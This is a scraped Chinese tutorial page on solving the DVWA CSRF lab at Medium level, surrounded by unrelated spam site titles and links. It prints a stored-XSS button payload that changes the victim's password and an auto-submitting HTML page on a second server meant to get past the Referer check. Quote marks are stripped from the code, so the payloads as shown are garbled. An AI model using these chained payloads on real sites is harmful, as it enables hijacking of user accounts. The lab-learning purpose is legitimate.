当前位置: 首页 > news >正文

免费建设网站领地网站建设安全

免费建设网站领地,网站建设安全,二级域名网站如何申请吗,net快速建站注意#xff1a; 1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK 2、把难度设置成 Medium 一、这一关同样我们需要埋下伏笔#xff0c;诱使用户点击来提交#xff0c;首先从XSS#xff08;Stored#xff09;入手。 注意#xff1a;在前面介绍…注意 1、这里对XSS(Stored)关卡不熟悉的可以从这里去看http://t.csdn.cn/ggQDK 2、把难度设置成  Medium 一、这一关同样我们需要埋下伏笔诱使用户点击来提交首先从XSSStored入手。 注意在前面介绍过如何进行XSS注入这里就不再讲解。http://t.csdn.cn/gs8xX 二、在上low难度中我们直接使用a标签来包裹修改密码的请求。但这一关a标签被过滤了。 所以我们使用的是button标签来提交修改密码的链接。 button Onclickalert(11)点我/button 简单查看效果可以触发 三、接下来是不是就简单了在这里使用 location.href“”  来提交类似第一关修改密码的GET请求不就ok? 构造payload注意这里的ip是web服务器的ip后面不要混淆 button Onclicklocation.hrefhttp://192.168.114.165/vulnerabilities/csrf/?password_new9999password_conf9999ChangeChange拿下/button 解析就是当用户点击这个按钮的时候会自动提交一个修改密码的get请求来修改当前用户的密码。 No matter who you are! 注入并查看结果经过验证确实在字符串的长度被限制了 四、所以果真没那么简单话不多说直接看答案。 提示 源码 用人话是这样说         1、第一关把整个GET请求藏进去没办法——长度限制         2、需要多个连接来实现——不然怎么叫跨站呢思路讲就是点击按钮让页面跳转到我在其他服务器114.199准备好的一个页面用这个页面来向114.165服务器来提交GET请求。         3、但是从源码可以看到这里有一个referer比如我们用114.199服务器提交GET请求的时候referer的ip会是114.199。所以也不会提交成功。         4、所以我们要绕过referer。 五、首先在114.199服务器上面创建一个chage_192.168.114.165.html      的文件,用来绕过referer。这里的IP是靶场的IP。内容如下 script// 向web服务器提交请求 function onlo(){location.hrefhttp://192.168.114.165/vulnerabilities/csrf/?password_new12581password_conf12581ChangeChange;} /Script body onloadonlo() 解析这个就相当于跨站脚本通过当用户跳转到这个页面这个页面马上就向Web靶场服务器一个修改密码的请求。来完成密码修改。 六、接下来构造payload button Onclicklocation.hrefhttp://192.168.114.199/change_192.168.114.165.html拿下/button #注意修改IP地址。href服务器上部署的那个脚本连接。 埋下伏笔 单击拿下抓包查看。 拿下
http://www.hkea.cn/news/14466672/

相关文章:

  • 企业网站制作比较好的html静态网站怎么放在网站上
  • 优秀的网站首页wordpress视频教程 电驴
  • 抚宁建设局网站东莞企业网络营销平台
  • 做金馆长网站网站2022年网络热点事件舆情案例
  • 大兴网站定制开发wordpress 的数据库路径
  • 清华大学学生工作做网站Wordpress 学校网站
  • 网站在线备案北京企业网站制作
  • 网站做快照网站的制作
  • 家政网站模版做网站客户端
  • 寮步网站制作重庆在线高校开放平台
  • 珠海做网站三年多少钱怎么查询网站的域名
  • 天蝎网站建设公司wordpress手册插件
  • 做app的网站有哪些设计logo多少钱
  • 宣传网站怎么做的保定网站建设多少钱
  • 做h的游戏 迅雷下载网站wordpress主题不显示图片
  • 泉州建设网站公司WordPress字库压缩
  • 建设工程监理考试网站中江建设局网站
  • 如今做那个网站致富网站打开速度与服务器
  • 没有域名怎么访问网站360建网站好不好?
  • 为什么一个网站做中英文双语版网站更换空间教程
  • 企业手机网站建设新闻微信积分商城
  • 图书馆网站建设情况汇报wordpress 编辑器标签
  • 庆网站建设做网站有免费的服务器吗
  • 企业微信网站开发文档wordpress首页出现恶意链接
  • 高校门户网站的建设方案网站建设开发公司有哪些
  • 盐城做网站哪家好阿里云域名注册流程
  • 企业网站都是静态的吗装饰公司如何拉客户
  • 域名注册最后是网站网站运营数据周报表怎么做
  • 网页设计好的网站注册公司有什么风险吗
  • 石家庄网站建设外包公司哪家好西安建设工程信息网的地址